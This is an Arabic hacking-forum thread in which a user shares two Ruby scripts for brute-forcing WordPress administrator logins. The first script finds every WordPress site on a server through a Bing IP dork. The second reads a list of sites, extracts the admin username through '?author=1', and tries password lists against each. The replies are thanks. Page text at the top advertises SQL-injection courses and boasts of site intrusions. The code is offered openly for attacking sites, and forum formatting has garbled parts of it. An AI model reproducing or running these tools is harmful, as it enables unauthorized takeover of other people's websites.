1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ أداة ] للتخمين على الوردبريس مع تخطي جميع المشاكل

الموضوع في 'قسم الأدوات' بواسطة 3ĿãS•βãĜħÐàÐ, بتاريخ ‏16 يونيو 2014.

كاتب الموضوع : 3ĿãS•βãĜħÐàÐ المشاهدات : 544 الردود : 4 ‏16 يونيو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    3ĿãS•βãĜħÐàÐ Beginner Creator
    rank
    Developer

    عضو منذ:
    ‏1 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    السلام عليكم و رحمة الله و بركاته

    بعد التحية و السلام

    حابب اقدملكم آدوات للتخمين على الوردبريس مع تخطي جميع المشاكل

    الأدوات مبرمجة بالروبي ةو تدعم multi thread للسرعة

    الأداة الأولى تقوم بالتخمين على جميع مواقع السيرفر

    [​IMG]

    كود PHP:
    #!/user/bin/ruby
    require 'net/http'
    require 'uri'
    def url(vu)
    uri URI.parse(vu)
    xs="#{uri.scheme}://#{uri.host}/#{uri.path.split('/')[1]}"
    xss="#{xs}"
    return xss
    end
    class String
    def green
    ;          "\033[32m#{self}\033[0m" end
    def bg_green
    ;       "\033[42m#{self}\033[0m" end
    end
    def xip
    (ips)
            (
    0..15).each do |xdv|
    dork="ip:#{ips}+page_id="      
    xs=URI("http://www.bing.com/search?q=#{dork}&first=#{xdv*10+1}")
    xdNet::HTTP.get_response(xs)
    body=xd.body
    sos
    =body.scan(/<cite>(.*?)<strong>/)
    return 
    sos.uniq
    end
    end
    def brut
    (urls,user,pwds)
    userz=user.chomp
    pwd
    =pwds.chomp
    ur
    =URI.parse(urls)
    pop=ur.host
    dd
    =ur.path
    http 
    Net::HTTP.new(pop80)
    #http.use_ssl = true
    path "#{dd}/wp-login.php"
    ip="http://#{pop}#{dd}/wp-admin"
    respdata http.get(pathnil)
    cookie resp.response['set-cookie']
    posts="log=#{userz}&pwd=#{pwd}&rememberme=forever&wp-submit=Log In&redirect_to=#{ip}&testcookie=1"
    mps= {'Cookie' => cookie,'Content-Type' => 'application/x-www-form-urlencoded'}
    Thread.new {
    respdata  http.post(pathpostsmps)
    }
    y.join(0.8)
    iz="http://#{pop}#{dd}"
    if resp.code == "302"
    print"[+] #{iz} \n".green
    print"[+] Found : #{userz} => #{pwd}\n".bg_green
    end
    end
    print"[+] Wordpress All server brut force multi thread [+]\n"
    print"[+] Hamza killer Sec4ever.com :D [+]\n"
    print("# Enter IP -> ")
    ipsz=gets.chomp
    print("# Enter Username ->")
    admin=gets.chomp
    print("# Enter Password list ->")
    pass=gets.chomp
    xs
    =IO.readlines(pass)
    xsdsq=xip(ipsz)
     
    for 
    xdz in xsdsq
    dz
    =xdz.uniq
    for pdz in dz
    x
    =url("http://#{pdz}")
    print 
    "| W0rking with #{x}\n"
    for pwd in xs
    brut
    (x,admin,pwd)
     
    end
    end
    end

    [IMG]http://im37.gulfup.com/MWaWQ.png[/IMG]

    الأداة الثانية يمكنك استعمال فيها لست مواقع مع إمكانية إستخرجا لليوزر اوثو و إذ لم تعمل ضعه بنفسك

    [​IMG]

    كود PHP:
    #!/user/bin/ruby 
    require 'net/http'
    require 'net/https'
    # if site use ssl Del "#" in linge 32

    class String
    def red
    ;            "\033[31m#{self}\033[0m" end
    def green
    ;          "\033[32m#{self}\033[0m" end
    def  brown
    ;         "\033[33m#{self}\033[0m" end
    def cyan
    ;           "\033[36m#{self}\033[0m" end
    def gray
    ;           "\033[37m#{self}\033[0m" end
    def blue
    ;           "\033[34m#{self}\033[0m" end
    def bg_red
    ;         "\033[41m#{self}\033[0m" end
    def bg_green
    ;       "\033[42m#{self}\033[0m" end
    def bg_brown
    ;       "\033[43m#{self}\033[0m" end
    def bg_blue
    ;        "\033[44m#{self}\033[0m" end
    end
    class Myfucb 
    def clean
    ()
    porRUBY_PLATFORM
    if(por =~ /linux/)
     
    system("clear")
    else
     
    system("cls")
    end
    end
    def home
    ()
    print 
    "
    [*]=========================================
    [*]\n"
    .brown
    print "
    [*]      Wordpress Auto   Brut Force
    [*]\n"
    .brown
    print "
    [*]    W  W W . S E C 4 E V E R . c 0 m
    [*]\n"
    .brown
    print "
    [*]       H A M Z A    K I L L E R
    [*]\n"
    .brown
    print "
    [*]       Hlyzidi[at]gmail[dot]com
    [*]\n"
    .brown
    print "
    [*]=========================================
    [*]\n\n\n"
    .brown
    end

    def brut
    (urls,user,pwds)
    userz=user.chomp
    pwd
    =pwds.chomp
    ur
    =URI.parse(urls)
    pop=ur.host
    dd
    =ur.path
    http 
    Net::HTTP.new(pop80)
    #http.use_ssl = true 
    path "#{dd}/wp-login.php"
    ip="http://#{pop}#{dd}/wp-admin"
    respdata http.get(pathnil)
    cookie resp.response['set-cookie']
    posts="log=#{userz}&pwd=#{pwd}&rememberme=forever&wp-submit=Log In&redirect_to=#{ip}&testcookie=1"
    mps= {'Cookie' => cookie,'Content-Type' => 'application/x-www-form-urlencoded'}
    respdata  http.post(pathpostsmps)

    iz="http://#{pop}#{dd}"
    if resp.code == "302"
    print"[+] #{iz} \n".green
    print"[+] Found : #{userz} => #{pwd}\n".bg_green
    exit
    else
    print
    "[-] Error : #{userz} =>";print"#{pwd}\r".bg_red
    end
    end
    def adminame
    (url)
    ur=URI.parse(url)
    pop=ur.host
    dd
    =ur.path
    path
    ="#{dd}?author=1"
    http Net::HTTP.new(pop,80)
    respdata http.get(pathnil)
    dz=resp.body
    po
    =dz.scan(/<title>(.*?)<\/title>/i
    for 
    dzx in po[0
      
    #mp=dzx.split('&')
     
    mpx=dzx.split('|')
     return 
    mpx[0]
    end
    end
    end
    p
    =Myfucb.new
    p.clean()
    p.home()
    print(
    "# Enter Sites File ->".cyan)
    site=gets.chomp
    print("# Enter Passwords File ->".cyan)
    pass=gets.chomp
    print("# Extect Username Atomatic (y/n)->".cyan)
    exus=gets.chomp
    sit
    =IO.readlines(site)
    pwd=IO.readlines(pass)
    p.clean()
    if 
    exus == "y"
    p.home()
    for 
    sites in (sit)
    user=p.adminame(sites)
    ur=URI.parse(sites)
    pop=ur.host
    dd
    =ur.path
    print("http://#{pop}#{dd}\n".bg_blue)
    print(
    "Username:#{user}\n".green)
    for 
    passwords in pwd
    p
    .brut(sites,user,passwords)

    end
    end
    elsif exus 
    == "n"
    p.home()
    print(
    "# Enter Username ->".cyan)
    us=gets.chomp

    for sites in (sit)
    ur=URI.parse(sites)
    pop=ur.host
    dd
    =ur.path
    print("http://#{pop}#{dd}\n".bg_blue)
    for 
    passwords in pwd
    p
    .brut(sites,us,passwords)
    end
    end
    end

    [IMG]http://im37.gulfup.com/MWaWQ.png[/IMG]

    تقولولي الأدوات مكرررين بكثرة لاكن معضمهم لا يعملون على النسخ الأخير بمشكلة

    لكويكز و اعضمهم ب php

    يعني ضعيفة شوية و هاذو مارح تجد فيههم مشاكل ابدا يمكن التخميين حتى 20000

    باسورد إذا اردت

    المهم وضعنها للأستفداة كانت برمجتهم من زمان xD

    [​IMG]

    تحياتي للجميع )5:"
     


    جاري تحميل الصفحة...
  2. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    رد: للتخمين على الوردبريس مع تخطي جميع المشاكل

    شكرا عزيزي عالاداة تستحق التجربة ...
     


  3. غير متصل

    αЗѕαя
    DeveloPer Plus

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: للتخمين على الوردبريس مع تخطي جميع المشاكل

    بارك الله فيك وجعله في ميزان حسناتك

    بالتوفيق
     


  4. غير متصل

    Attack
    rank
    Developer

    عضو منذ:
    ‏27 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: للتخمين على الوردبريس مع تخطي جميع المشاكل

    سلمت يمينـــك و دمت بكل خير
     


  5. غير متصل

    •» яέŁάx «•
    rank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: للتخمين على الوردبريس مع تخطي جميع المشاكل

    يعطيك العافيه !:"​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...